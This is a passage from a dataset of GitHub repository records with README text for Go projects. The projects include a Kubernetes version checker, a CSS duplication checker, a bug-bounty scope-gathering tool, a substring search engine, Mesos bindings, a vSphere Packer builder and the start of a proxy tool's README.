"quay", "gcr"], "stars": 548, "description": "Kubernetes utility for exposing image versions in use, compared to latest available upstream, as metrics.", "lang": "Go", "repo_lang": "", "readme": "# version-checker\n\nversion-checker is a Kubernetes utility for observing the current versions of\nimages running in the cluster, as well as the latest available upstream. These\nchecks get exposed as Prometheus metrics to be viewed on a dashboard, or _soft_\nalert cluster operators.\n\n> This tool is currently experimental.\n\nIf you're interested in this tool, version checking is a built-in feature\nin our [Preflight](https://preflight.jetstack.io/) product. You may want to \ncheck it out if you would like multi-cluster component version checking.\n\n## Registries\n\nversion-checker supports the following registries:\n\n- [ACR](https://azure.microsoft.com/en-us/services/container-registry/)\n- [Docker Hub](https://hub.docker.com/)\n- [ECR](https://aws.amazon.com/ecr/)\n- [GCR](https://cloud.google.com/container-registry/) (inc gcr facades such as k8s.gcr.io)\n- [Quay](https://quay.io/)\n- Self Hosted (Docker V2 API compliant registries, e.g.\n [registry](https://hub.docker.com/_/registry),\n [artifactory](https://jfrog.com/artifactory/) etc.). Multiple self hosted\n registries can be configured at once.\n\nThese registries support authentication.\n\n---\n\n## Installation\n\nversion-checker can be installed as either static manifests;\n\n```sh\n$ kubectl apply -k ./deploy/yaml\n```\n\nOr through helm;\n\n```sh\n$ cd ./deploy/charts/version-checker && kubectl create namespace version-checker\n$ helm install version-checker . -n version-checker\n```\n\nThe helm chart supports creating a Prometheus/ServiceMonitor to expose the\nversion-checker metrics.\n\n#### Grafana Dashboard\n\nA [grafana dashboard](https://grafana.com/grafana/dashboards/12833) is also\navailable to view the image versions as a table.\n\n![](img/grafana.jpg)\n
\n

\n Grafana Dashboard
\n

\n\n---\n\n## Options\n\nBy default, without the flag `-a, --test-all-containers`, version-checker will\nonly test containers where the pod has the annotation\n`enable.version-checker.io/*my-container*`, where `*my-container*` is the `name`\nof the container in the pod.\n\nversion-checker supports the following annotations present on **other** pods to\nenrich version checking on image tags:\n\n- `pin-major.version-checker.io/my-container: 4`: will pin the major version to\n check to 4 (`v4.0.0`).\n\n- `pin-minor.version-checker.io/my-container: 3`: will pin the minor version to\n check to 3 (`v0.3.0`).\n\n- `pin-patch.version-checker.io/my-container: 23`: will pin the patch version to\n check to 23 (`v0.0.23`).\n\n- `use-metadata.version-checker.io/my-container: \"true\"`: will allow to search\n for image tags which contain information after the first part of the semver\n string. For example, this can be pre-releases or build metadata\n (`v1.2.4-alpha.0`, `v1.2.3-debian-r3`).\n\n- `use-sha.version-checker.io/my-container: \"true\"`: will check against the latest\n SHA tag available. Essentially, the latest image by date. This is silently\n set to true if no image tag, or \"latest\" image tag is set. Cannot be used with\n any other options.\n\n- `match-regex.version-checker.io/my-container: ^v\\d+\\.\\d+\\.\\d+-debian-`: is\n used for only comparing against image tags which match the regex set. For\n example, the above annotation will only check against image tags which have\n the form of something like `v1.3.4-debian-r30`.\n `use-metadata.version-checker.io` is not required when this is set. All\n other options, apart from URL overrides, are ignored when this is set.\n\n- `override-url.version-checker.io/my-container: docker.io/bitnami/etcd`: is\n used to change the URL for where to lookup where the latest image version\n is. In this example, the current version of `my-container` will be compared\n against the image versions in the `docker.io/bitnami/etcd` registry.\n\n\n## Metrics\n\nBy default, version-checker will expose the version information as Prometheus\nmetrics on `0.0.0.0:8080/metrics`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ruilisi/css-checker", "link": "https://github.com/ruilisi/css-checker", "tags": ["css", "redundancy-analysis", "cicd", "code-quality"], "stars": 547, "description": "Reduce Similar & Duplicated CSS Classes with Diff in Seconds!", "lang": "Go", "repo_lang": "", "readme": "

\n \n \"CSS-CHECKER\"\n \n

\n

CSS Checker - Less is More

\n

\n \n \n \n

\n

\n \u4e2d\u6587\u6587\u6863\n

\n\n## Purpose\n\n`css-checker` checks your CSS styles for duplications and finds the diff among `CSS classes` with high similarity in seconds. It is designed to avoid redundantly or `similar css` and `styled components` between files and to work well for both local developments, and for automation like CI.\n\nSimilarity check, duplication check, colors check, long lines warning are supported by default. Styled components check, Unused CSS check can be enabled optionally. CSS checker can help reduce CSS code for developers in seconds.\n\n

See more on Wiki

\n\n## Install\n\n#### Using Go\uff1a\n\n```\ngo install github.com/ruilisi/css-checker@latest\n```\n\n(With go version before 1.17, use `go get github.com/ruilisi/css-checker`). Or download from [releases](https://github.com/ruilisi/css-checker/releases)\n\n#### Using npm\uff1a\n\n```\nnpm install -g css-checker-kit\n```\n\n## Usage\n\n#### Run\n\n- `cd PROJECT_WITH_CSS_FILES` and just run:\n\n```\ncss-checker\n```\n\n- (Beta Feature: styled components check): `css-checker -styled`\n\n![DEMO](https://assets.ruilisi.com/css-checker-demo.gif)\n\n(Check and show the diff among similar classes (>=80%). Colors, long scripts that are used more than once will also be pointed out by default. Check `css-checker -help` for customized options.)\n\n- Colors with `rgb/rgba/hsl/hsla/hex` will be converted to rbga and compared together.\n\n- (Alpha Feature: Find classes that are not referred to by your code): `css-checker -unused`\n\n#### Run with path\n\n- `css-checker -path=YOUR_PROJECT_PATH`\n\n#### File Ignores\n\n- CSS-Checker ignores paths in `.gitignore` by default (You can disable this to read all files by using `-unrestricted=true`).\n- For adding extra paths to ignore, using: `-ignores=node_modules,packages `.\n\n#### Config File\n\n- `css-checker.yaml`: CSS-Checker read this yaml file in your project path for settings, you can use parameters in `Basic Commands` sections to set up this file (without the leading '-').\n- A sample yaml file named 'css-checker.example.yaml' is also provided in this project, move it to your project path with the name 'css-checker.yaml' and it will work.\n- To specify your config file, use `-config=YOUR_CONFIG_FILE_PATH`.\n\n#### Advanced Features\n\n- Run with styled components check only (without checks for css): `css-checker -css=false -styled`\n- Find classes that not referred by your code: `css-checker -unused` (Alpha)\n\n#### Basic commands\n\n- `colors`: whether to check colors (default true)\n- `css`: whether to check css files (default true as you expected)\n- `config`: set configuration file path (string, default './css-checker.yaml')\n- `ignores`: paths and files to be ignored (e.g. node_modules,\\*.example.css) (string, default '')\n- `length-threshold`: Min length of a single style value (no including the key) that to be considered as long script line (default 20)\n- `long-line`: whether to check duplicated long script lines (default true)\n- `path`: set path to files, default to be current folder (default \".\")\n- `sections`: whether to check css class duplications (default true)\n- `sim`: whether to check similar css classes (default true)\n- `sim-threshold`: Threshold for Similarity Check ($\\geq20$ && $\\lt100$) (int only, e.g. 80 for 80%, checks for identical classes defined in `sections`) (default 80)\n- `styled`: checks for styled components (default false)\n- `unrestricted`: search all files (gitignore)\n- `unused`: whether to check unused classes (Beta)\n- `version`: prints current version and exits\n- `to-file`: wherther generate a html file (default true)\n- `file-name`: if to-file is true, set the html file name(default css-checker.html)\n\n\n#### Outputs:\n\n![image.png](https://assets.ruilisi.com/t=yDNXWrmyg+V6mUzCAG7A==)\n\n#### How to get similarities between classes?\n\n0. Hash each line of class (aka. `section` in our code), Generate map: `LineHash -> Section`.\n1. Convert map `LineHash -> Section` => `[SectionIndex1][SectionIndex2] -> Duplicated Hashes`, section stands for css class.\n2. In map: `[SectionIndex1][SectionIndex2]` -> `Duplicated Hashes`, number of the duplicated hashes stands for duplicated lines between classes.\n\n#### Similarity Check\n\nCheck similarities ($\\geq(sim-threshold)$ && $\\lt100$) between classes. This will print the same line in between classes.\n\n- $sim-threshold$: using `-sim-threshold=` params or setting `sim-threshold:` in config yaml file, default 80, min 20.\n\n![image.png](https://assets.ruilisi.com/bzljM=P4Mz+dmtHKNvdHtg==)\n\n#### Duplicated CSS Classes\n\nSimilar to `Similarity Check` but put those classes that are totally identical to each other.\n\n#### Long Script Line Check\n\nLong scripts can be saved as variables to make your life easier. This will only alert when long lines are used for more than once.\n\n![image.png](https://assets.ruilisi.com/5bdqZTuLTzJCaGSynA7+2w==)\n\n#### Colors Check\n\nCheck colors in HEX/RGB/RGBA/HSL/HSLA that are used more than once in your code. As for supporting of different themes and possibly future updates of your color set, you may consider putting them as CSS variables.\n\n![image.png](https://assets.ruilisi.com/iqmnGQHwglb+pxE3kr3L1Q==)\n\n## Build & Release\n\n- `make test-models`\n- `make build`\n- `make release`\n\n## Q&A\n#### Ugly output in PowerShell\nFrom PowerShell, paste the following script and run it to activate `ANSI escape sequences`, then restart your PowerShell.\n```\nSet-ItemProperty HKCU:\\Console VirtualTerminalLevel -Type DWORD 1\n```\n\n## Authors\n- [Xiemala Team](https://xiemala.com). It helps in removing hundreds of similar CSS classes for developers in this project.\n", "readme_type": "markdown", "hn_comments": "If I understand this correctly, it is similar to Parcel's bundler/minifier: https://css-tricks.com/parcel-css/Except that Parcel is a parser, deduper, transformer [autoprefixer, future-CSS-to-current-convertor] and minifier.And that, in turn, is based on CSSNano [although it is a complete rewrite in Rust], IIRC.Can someone confirm that I understand correctly, and if so, how does this compare to Parcel? To CSSNano or PurgeCSS?I use https://www.projectwallace.com/ to check CSS quality. It does a lot more than just checking for similar declarations.> It is designed to avoid redundant or similar css between filesSee also CSS Stats, https://cssstats.com/, and atomic/functional/utility CSS libraries more generally which are designed exactly to eliminate as much redundant CSS as possible.these type of tools always end up biting you in the assSince when is CSS a \u201cscript\u201d?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sw33tLie/bbscope", "link": "https://github.com/sw33tLie/bbscope", "tags": [], "stars": 547, "description": "Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!", "lang": "Go", "repo_lang": "", "readme": "# bbscope\nThe ultimate scope gathering tool for [HackerOne](https://hackerone.com/), [Bugcrowd](https://bugcrowd.com/), [Intigriti](https://intigriti.com), [Immunefi](https://immunefi.com/) and [YesWeHack](https://yeswehack.com/) by sw33tLie.\n\nNeed to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. \nWhat about getting a list of android apps that you are allowed to test? We've got you covered as well.\n\nReverse engineering god? No worries, you can get a list of binaries to analyze too :)\n\n## Installation\nMake sure you've a recent version of the Go compiler installed on your system.\nThen just run:\n```\nGO111MODULE=on go install github.com/sw33tLie/bbscope@latest\n```\n\n## Usage\n```\nbbscope (h1|bc|it) -t \n```\nHow to get the session token:\n- HackerOne: login, then grab your API token [here](https://hackerone.com/settings/api_token/edit)\n- Bugcrowd: login, then grab the `_crowdcontrol_session` cookie\n- Intigriti: login, then intercept a request to api.intigriti.com and look for the `Authentication: Bearer XXX` header. XXX is your token\n- YesWeHack: login, then intercept a request to api.yeswehack.com and look for the `Authorization: Bearer XXX` header. XXX is your token\n\nWhen using bbscope for HackerOne, the username flag (`-u`) is mandatory.\n\nRemember that you can use the --help flag to get a description for all flags.\n\n## Examples\nBelow you'll find some example commands.\nKeep in mind that all of them work with Bugcrowd, Intigriti and YesWeHack subcommands (`bc`, `it` and `ywh`) as well, not just with `h1`.\n\n### Print all in-scope targets from all your HackerOne programs that offer rewards\n```\nbbscope h1 -t -u -b -o t\n```\nThe output will look like this:\n```\napp.example.com\n*.user.example.com\n*.demo.com\nwww.something.com\n```\n\n### Print all in-scope targets from all your private Bugcrowd programs that offer rewards\n```\nbbscope bc -t -b -p -o t\n```\n\n### Print all in-scope Android APKs from all your HackerOne programs\n```\nbbscope h1 -t -u -o t -c android\n```\n\n### Print all in-scope targets from all your HackerOne programs with extra data\n\n```\nbbscope h1 -t -u -o tdu -d \", \"\n```\n\nThis will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL.\nIt might look like this:\n```\nsomething.com, Something's main website, https://hackerone.com/something\n*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo\n```\n### Get program URLs for your HackerOne private programs\n\n```\nbbscope h1 -t -u -o u -p | sort -u\n```\nYou'll get a list like this:\n```\nhttps://hackerone.com/demo\nhttps://hackerone.com/something\n```\n\n## Beware of scope oddities\nIn an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy.\nUnfortunately, that's not always the case.\n\nSometimes assets are assigned the wrong category.\nFor example, if you're going after URLs using the `-c url`, double checking using `-c all` is often a good idea.\n\nOther times, on HackerOne, you will find targets written in the scope description, instead of in the scope title.\nA few programs that do this are:\n- [Verizon Media](https://hackerone.com/verizonmedia/?type=team)\n- [Mail.ru](https://hackerone.com/mailru)\n\nIf you want to grep those URLs as well, you **MUST** include `d` in the printing options flag (`-o`).\n\nSometimes it gets even stranger: [Spotify](https://hackerone.com/spotify) uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description.\n\nHuman minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).\n\n## Thanks\n- [0xatul](https://github.com/0xatul)\n- [JoeMilian](https://github.com/JoeMilian)\n- [ByteOven](https://github.com/ByteOven)\n- [dee-see](https://gitlab.com/dee-see)\n- [jub0bs](https://jub0bs.com)\n- [0xbeefed](https://github.com/0xbeefed)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "argusdusty/Ferret", "link": "https://github.com/argusdusty/Ferret", "tags": [], "stars": 547, "description": "An optimized substring search engine written in Go", "lang": "Go", "repo_lang": "", "readme": "Ferret\n======\n## An optimized substring search engine written in Go.\nFerret makes use of a combination of an Inverted Index and a Suffix Array to allow log-time lookups with a relatively small memory footprint.\nAlso incorporates error-correction (Levenshtein distance 1) and simple Unicode-to-ASCII conversion.\nAllows for arbitrary sorting functions\nAllows you to map arbitrary data to your results, and quickly update this data.\n\n***Author:*** Mark Canning
\n***Developed at/for:*** Tamber - http://www.tamber.com/\n\nInstalling\n----------\nInstall: `go get github.com/argusdusty/Ferret`
\nUpdate: `go get -u github.com/argusdusty/Ferret`
\nUser: `import \"github.com/argusdusty/Ferret\"`
\n\nPerformance\n-----------\nUses linear memory (~10-18 bytes per character)\nSearches performed in log time with the number of characters in the dictionary.\nSorted searches can be slow, taking ~linear time with the number of matches, rather than linear time with the results limit.\nInitialization takes linearithmic (ln(n)\\*n) time (being a sorting algorithm)\n\n\nThe code is meant to be as fast as possible for a substring dictionary search, and as such is best suited for medium-large dictionaries with ~1-100 million total characters. I've timed 10s initialization for 3.5 million characters on a modern CPU, and 10us search time (4000us with error-correction), so this system is capable of ~100,000 queries per second on a single processor - feel free to try the benchmarks in dictionaryexample.go.\n\nSample usage\n------------\n\n### Initializing the search engine:\n```go\n// Allows for exact (case-sensitive) substring searches over a list of songs \n// mapping their respective artists, allowing sorting by the song popularity\nSearchEngine := ferret.New(Songs, Artists, SongPopularities, func(s string) []byte { return []byte(s) })\n\n// Allows for lowercase-ASCII substring searches over a list of songs\n// mapping their respective artists, allowing sorting by the song popularity\nSearchEngine := ferret.New(Songs, Artists, SongPopularities, ferret.UnicodeToLowerASCII)\n\n// Allows for lowercase-ASCII substring searches over a list of artists,\n// allowing sorting by the artist popularity\nSearchEngine := ferret.New(Artists, Artists, ArtistPopularities, ferret.UnicodeToLowerASCII)\n```\n\t\t\n### Inserting a new element into the search engine:\n```go\n// Add a song to an existing SearchEngine, written by Artist,\n// and with popularity SongPopularity\nSearchEngine.Insert(Song, Artist, SongPopularity)\n```\n\n### Performing simple unsorted substring search:\n```go\n// For songs - returns a list of up to 25 artists of the matching songs,\n// and the song popularities\nSearchEngine.Query(SongQuery, 25)\n```\n\t\n### Performing a sorted substring search:\n```go\n// For songs - returns a list of up to 25 artists of the matching songs,\n// and the song popularities, sorted by the song popularities\n// assuming the song popularities are float64s\nSearchEngine.SortedQuery(SongQuery, 25, func(s string, v interface{}, l int, i int) float64 { return v.(float64) })\n```\n\n### More examples\t\nCheck out example/example.go and example/dictionaryexample.go for more example usage.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mesos/mesos-go", "link": "https://github.com/mesos/mesos-go", "tags": ["mesos"], "stars": 547, "description": "Go language bindings for Apache Mesos", "lang": "Go", "repo_lang": "", "readme": "# Go bindings for Apache Mesos\n\nPure Go language bindings for Apache Mesos, under development.\nAs with other pure implementations, mesos-go uses the HTTP wire protocol to communicate directly with a running Mesos master and its slave instances.\nOne of the objectives of this project is to provide an idiomatic Go API that makes it super easy to create Mesos frameworks using Go. \n\n[![Build Status](https://travis-ci.org/mesos/mesos-go.svg)](https://travis-ci.org/mesos/mesos-go)\n[![GoDoc](https://godoc.org/github.com/mesos/mesos-go?status.png)](https://godoc.org/github.com/mesos/mesos-go)\n[![Coverage Status](https://coveralls.io/repos/github/mesos/mesos-go/badge.svg?branch=master)](https://coveralls.io/github/mesos/mesos-go?branch=master)\n\n## Status\nNew projects should use the Mesos v1 API bindings, located in `api/v1`.\nUnless otherwise indicated, the remainder of this README describes the Mesos v1 API implementation.\n\nPlease **vendor** this library to avoid unpleasant surprises via `go get ...`.\n\nThe Mesos v0 API version of the bindings, located in `api/v0`, are more mature but will not see any major development besides critical compatibility and bug fixes.\n\n### Compatibility\n`mesos-N` tags mark the start of support for a specific Mesos version while maintaining backwards compatibility with the previous major version.\n\n### Features\n- The SchedulerDriver API implemented\n- The ExecutorDriver API implemented\n- Example programs on how to use the API\n- Modular design for easy readability/extensibility\n\n### Pre-Requisites\n- Go 1.7 or higher; https://golang.org/dl/\n - A standard and working Go workspace setup (multiple golang versions are tested via CI)\n- Apache Mesos 1.x; http://mesos.apache.org/downloads/\n- protoc compiler; https://github.com/google/protobuf/releases\n - v3.3.x is tested by CI and should be used for code generation\n- `govendor`; https://github.com/kardianos/govendor\n\n## Installing\nUsers of this library are encouraged to vendor it. API stability isn't guaranteed at this stage.\n```shell\n# download the source code\n$ go get -d github.com/mesos/mesos-go\n\n# build the example binaries\n$ cd $GOPATH/src/github.com/mesos/mesos-go\n$ make install\n```\n\n## Testing\n```shell\n$ make test\n```\n\n## Contributing\nContributions are welcome. Please refer to [CONTRIBUTING.md](CONTRIBUTING.md) for\nguidelines.\n\n## License\nThis project is [Apache License 2.0](LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jetbrains-infra/packer-builder-vsphere", "link": "https://github.com/jetbrains-infra/packer-builder-vsphere", "tags": ["vsphere", "packer"], "stars": 547, "description": "Packer plugin for remote builds on VMware vSphere", "lang": "Go", "repo_lang": "", "readme": "[![Team project](http://jb.gg/badges/obsolete.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n[![GitHub latest release](https://img.shields.io/github/release/jetbrains-infra/packer-builder-vsphere.svg)](https://github.com/jetbrains-infra/packer-builder-vsphere/releases)\n[![GitHub downloads](https://img.shields.io/github/downloads/jetbrains-infra/packer-builder-vsphere/total.svg)](https://github.com/jetbrains-infra/packer-builder-vsphere/releases)\n[![TeamCity build status](https://img.shields.io/teamcity/http/teamcity.jetbrains.com/s/PackerVSphere_Build.svg)](https://teamcity.jetbrains.com/viewType.html?buildTypeId=PackerVSphere_Build&guest=1)\n\n# Deprecation notice\nThis plugin was merged into [official Packer repository](https://github.com/hashicorp/packer) and released with Packer since version 1.5.2.\n \nPlease use modern version of Packer and report problems, feature suggestions to main Packer repository.\n\nThis repository left for history and archived. \n\n\n# Packer Builder for VMware vSphere\n\nThis a plugin for [HashiCorp Packer](https://www.packer.io/). It uses native vSphere API, and creates virtual machines remotely.\n\n`vsphere-iso` builder creates new VMs from scratch.\n`vsphere-clone` builder clones VMs from existing templates.\n\n- VMware Player is not required.\n- Official vCenter API is used, no ESXi host [modification](https://www.packer.io/docs/builders/vmware-iso.html#building-on-a-remote-vsphere-hypervisor) is required.\n\n## Installation\n* Download binaries from the [releases page](https://github.com/jetbrains-infra/packer-builder-vsphere/releases).\n* [Install](https://www.packer.io/docs/extending/plugins.html#installing-plugins) the plugins, or simply put them into the same directory with JSON templates. On Linux and macOS run `chmod +x` on the files.\n\n## Build\n\nInstall Go and [dep](https://github.com/golang/dep/releases), run `build.sh`.\n\nOr build inside a container by Docker Compose:\n```\ndocker-compose run build\n```\n\nThe binaries will be in `bin/` directory.\n\nArtifacts can be also downloaded from [TeamCity builds](https://teamcity.jetbrains.com/viewLog.html?buildTypeId=PackerVSphere_Build&buildId=lastSuccessful&tab=artifacts&guest=1).\n\n## Examples\n\nSee complete Ubuntu, Windows, and macOS templates in the [examples folder](https://github.com/jetbrains-infra/packer-builder-vsphere/tree/master/examples/).\n\n## Parameter Reference\n\n### Connection\n\n* `vcenter_server`(string) - vCenter server hostname.\n* `username`(string) - vSphere username.\n* `password`(string) - vSphere password.\n* `insecure_connection`(boolean) - Do not validate vCenter server's TLS certificate. Defaults to `false`.\n* `datacenter`(string) - VMware datacenter name. Required if there is more than one datacenter in vCenter.\n\n### VM Location\n\n* `vm_name`(string) - Name of the new VM to create.\n* `folder`(string) - VM folder to create the VM in.\n* `host`(string) - ESXi host where target VM is created. A full path must be specified if the host is in a folder. For example `folder/host`. See the `Specifying Clusters and Hosts` section above for more details.\n* `cluster`(string) - ESXi cluster where target VM is created. See [Working with Clusters](#working-with-clusters).\n* `resource_pool`(string) - VMWare resource pool. Defaults to the root resource pool of the `host` or `cluster`.\n* `datastore`(string) - VMWare datastore. Required if `host` is a cluster, or if `host` has multiple datastores.\n* `notes`(string) - VM notes.\n\n### VM Location (`vsphere-clone` only)\n\n* `template`(string) - Name of source VM. Path is optional.\n* `linked_clone`(boolean) - Create VM as a linked clone from latest snapshot. Defaults to `false`.\n\n### Hardware\n\n* `CPUs`(number) - Number of CPU sockets.\n* `cpu_cores`(number) - Number of CPU cores per socket.\n* `CPU_limit`(number) - Upper limit of available CPU resources in MHz.\n* `CPU_reservation`(number) - Amount of reserved CPU resources in MHz.\n* `CPU_hot_plug`(boolean) - Enable CPU hot plug setting for virtual machine. Defaults to `false`.\n* `RAM`(number) - Amount of RAM in MB.\n* `RAM_reservation`(number) - Amount of reserved RAM in MB.\n* `RAM_reserve_all`(boolean) - Reserve all available RAM. Defaults to `false`. Cannot be used together with `RAM_reservation`.\n* `RAM_hot_plug`(boolean) - Enable RAM hot plug setting for virtual machine. Defaults to `false`.\n* `video_ram`(number) - Amount of video memory in MB.\n* `disk_size`(number) - The size of the disk in MB.\n* `network`(string) - Set network VM will be connected to.\n* `NestedHV`(boolean) - Enable nested hardware virtualization for VM. Defaults to `false`.\n* `configuration_parameters`(map) - Custom parameters.\n* `boot_order`(string) - Priority of boot devices. Defaults to `disk,cdrom`\n\n### Hardware (`vsphere-iso` only)\n\n* `vm_version`(number) - Set VM hardware version. Defaults to the most current VM hardware version supported by vCenter. See [VMWare article 1003746](https://kb.vmware.com/s/article/1003746) for the full list of supported VM hardware versions.\n* `guest_os_type`(string) - Set VM OS type. Defaults to `otherGuest`. See [here](https://pubs.vmware.com/vsphere-6-5/index.jsp?topic=%2Fcom.vmware.wssdk.apiref.doc%2Fvim.vm.GuestOsDescriptor.GuestOsIdentifier.html) for a full list of possible values.\n* `disk_controller_type`(string) - Set VM disk controller type. Example `pvscsi`.\n* `disk_thin_provisioned`(boolean) - Enable VMDK thin provisioning for VM. Defaults to `false`.\n* `network_card`(string) - Set VM network card type. Example `vmxnet3`.\n* `usb_controller`(boolean) - Create USB controller for virtual machine. Defaults to `false`.\n* `cdrom_type`(string) - Which controller to use. Example `sata`. Defaults to `ide`.\n* `firmware`(string) - Set the Firmware at machine creation. Example `efi`. Defaults to `bios`.\n\n\n### Boot (`vsphere-iso` only)\n\n* `iso_paths`(array of strings) - List of datastore paths to ISO files that will be mounted to the VM. Example `\"[datastore1] ISO/ubuntu.iso\"`.\n* `floppy_files`(array of strings) - List of local files to be mounted to the VM floppy drive. Can be used to make Debian preseed or RHEL kickstart files available to the VM.\n* `floppy_dirs`(array of strings) - List of directories to copy files from.\n* `floppy_img_path`(string) - Datastore path to a floppy image that will be mounted to the VM. Example `[datastore1] ISO/pvscsi-Windows8.flp`.\n* `http_directory`(string) - Path to a directory to serve using a local HTTP server. Beware of [limitations](https://github.com/jetbrains-infra/packer-builder-vsphere/issues/108#issuecomment-449634324).\n* `http_ip`(string) - Specify IP address on which the HTTP server is started. If not provided the first non-loopback interface is used.\n* `http_port_min` and `http_port_max` as in other [builders](https://www.packer.io/docs/builders/virtualbox-iso.html#http_port_min).\n* `iso_urls`(array of strings) - Multiple URLs for the ISO to download. Packer will try these in order. If anything goes wrong attempting to download or while downloading a single URL, it will move on to the next. All URLs must point to the same file (same checksum). By default this is empty and iso_url is used. Only one of iso_url or iso_urls can be specified.\n* `iso_checksum `(string) - The checksum for the OS ISO file. Because ISO files are so large, this is required and Packer will verify it prior to booting a virtual machine with the ISO attached. The type of the checksum is specified with iso_checksum_type, documented below. At least one of iso_checksum and iso_checksum_url must be defined. This has precedence over iso_checksum_url type.\n* `iso_checksum_type`(string) - The type of the checksum specified in iso_checksum. Valid values are none, md5, sha1, sha256, or sha512 currently. While none will skip checksumming, this is not recommended since ISO files are generally large and corruption does happen from time to time.\n* `iso_checksum_url`(string) - A URL to a GNU or BSD style checksum file containing a checksum for the OS ISO file. At least one of iso_checksum and iso_checksum_url must be defined. This will be ignored if iso_checksum is non empty.\n* `boot_wait`(string) Amount of time to wait for the VM to boot. Examples 45s and 10m. Defaults to 10 seconds. See [format](https://golang.org/pkg/time/#ParseDuration).\n* `boot_command`(array of strings) - List of commands to type when the VM is first booted. Used to initalize the operating system installer. See details in [Packer docs](https://www.packer.io/docs/builders/virtualbox-iso.html#boot-command).\n\n### Provision\n\n* `communicator` - `ssh` (default), `winrm`, or `none` (create/clone, customize hardware, but do not boot).\n* `ip_wait_timeout`(string) - Amount of time to wait for VM's IP, similar to 'ssh_timeout'. Defaults to 30m (30 minutes). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n* `ip_settle_timeout`(string) - Amount of time to wait for VM's IP to settle down, sometimes VM may report incorrect IP initially, then its recommended to set that parameter to apx. 2 minutes. Examples 45s and 10m. Defaults to 5s(5 seconds). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n* `ssh_username`(string) - Username in guest OS.\n* `ssh_password`(string) - Password to access guest OS. Only specify `ssh_password` or `ssh_private_key_file`, but not both.\n* `ssh_private_key_file`(string) - Path to the SSH private key file to access guest OS. Only specify `ssh_password` or `ssh_private_key_file`, but not both.\n* `winrm_username`(string) - Username in guest OS.\n* `winrm_password`(string) - Password to access guest OS.\n* `shutdown_command`(string) - Specify a VM guest shutdown command. VMware guest tools are used by default.\n* `shutdown_timeout`(string) - Amount of time to wait for graceful VM shutdown. Examples 45s and 10m. Defaults to 5m(5 minutes). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n\n### Postprocessing\n\n* `create_snapshot`(boolean) - Create a snapshot when set to `true`, so the VM can be used as a base for linked clones. Defaults to `false`.\n* `convert_to_template`(boolean) - Convert VM to a template. Defaults to `false`.\n\n## Working with Clusters\n#### Standalone Hosts\nOnly use the `host` option. Optionally specify a `resource_pool`:\n```\n\"host\": \"esxi-1.vsphere65.test\",\n\"resource_pool\": \"pool1\",\n```\n\n#### Clusters Without DRS\nUse the `cluster` and `host `parameters:\n```\n\"cluster\": \"cluster1\",\n\"host\": \"esxi-2.vsphere65.test\",\n```\n\n#### Clusters With DRS\nOnly use the `cluster` option. Optionally specify a `resource_pool`:\n```\n\"cluster\": \"cluster2\",\n\"resource_pool\": \"pool1\",\n```\n\n## Required vSphere Permissions\n\n* VM folder (this object and children):\n ```\n Virtual machine -> Inventory\n Virtual machine -> Configuration\n Virtual machine -> Interaction\n Virtual machine -> Snapshot management\n Virtual machine -> Provisioning\n ```\n Individual privileges are listed in https://github.com/jetbrains-infra/packer-builder-vsphere/issues/97#issuecomment-436063235.\n* Resource pool, host, or cluster (this object): \n ```\n Resource -> Assign virtual machine to resource pool\n ```\n* Host in clusters without DRS (this object): \n ```\n Read-only\n ```\n* Datastore (this object): \n ```\n Datastore -> Allocate space\n Datastore -> Browse datastore\n Datastore -> Low level file operations\n ``` \n* Network (this object): \n ```\n Network -> Assign network\n ```\n* Distributed switch (this object): \n ```\n Read-only\n ```\n\nFor floppy image upload:\n\n* Datacenter (this object): \n ```\n Datastore -> Low level file operations\n ```\n* Host (this object): \n ```\n Host -> Configuration -> System Management\n ```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yinqiwen/gsnova", "link": "https://github.com/yinqiwen/gsnova", "tags": ["tcp", "quic", "kcp", "tls", "http2", "http", "websocket", "ssh", "proxy", "transparent-proxy", "mitmproxy", "packet-capture", "nat", "p2p", "p2s2p", "low-memory"], "stars": 546, "description": "Private proxy solution & network troubleshooting tool.", "lang": "Go", "repo_lang": "", "readme": "GSnova: Private Proxy Solution & Network Troubleshooting Tool. \r\n[![Join the chat at https://gitter.im/gsnova/Lobby](https://badges.gitter.im/gsnova/Lobby.svg)](https://gitter.im/gsnova/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\r\n[![Build Status](https://travis-ci.org/yinqiwen/gsnova.svg?branch=master)](https://travis-ci.org/yinqiwen/gsnova)\r\n\r\n``` \r\n \r\n\t ___ ___ ___ ___ ___ ___ \r\n\t /\\ \\ /\\ \\ /\\__\\ /\\ \\ /\\__\\ /\\ \\ \r\n\t /::\\ \\ /::\\ \\ /::| | /::\\ \\ /:/ / /::\\ \\ \r\n\t /:/\\:\\ \\ /:/\\ \\ \\ /:|:| | /:/\\:\\ \\ /:/ / /:/\\:\\ \\ \r\n\t /:/ \\:\\ \\ _\\:\\~\\ \\ \\ /:/|:| |__ /:/ \\:\\ \\ /:/__/ ___ /::\\~\\:\\ \\ \r\n\t /:/__/_\\:\\__\\/\\ \\:\\ \\ \\__\\/:/ |:| /\\__\\/:/__/ \\:\\__\\|:| | 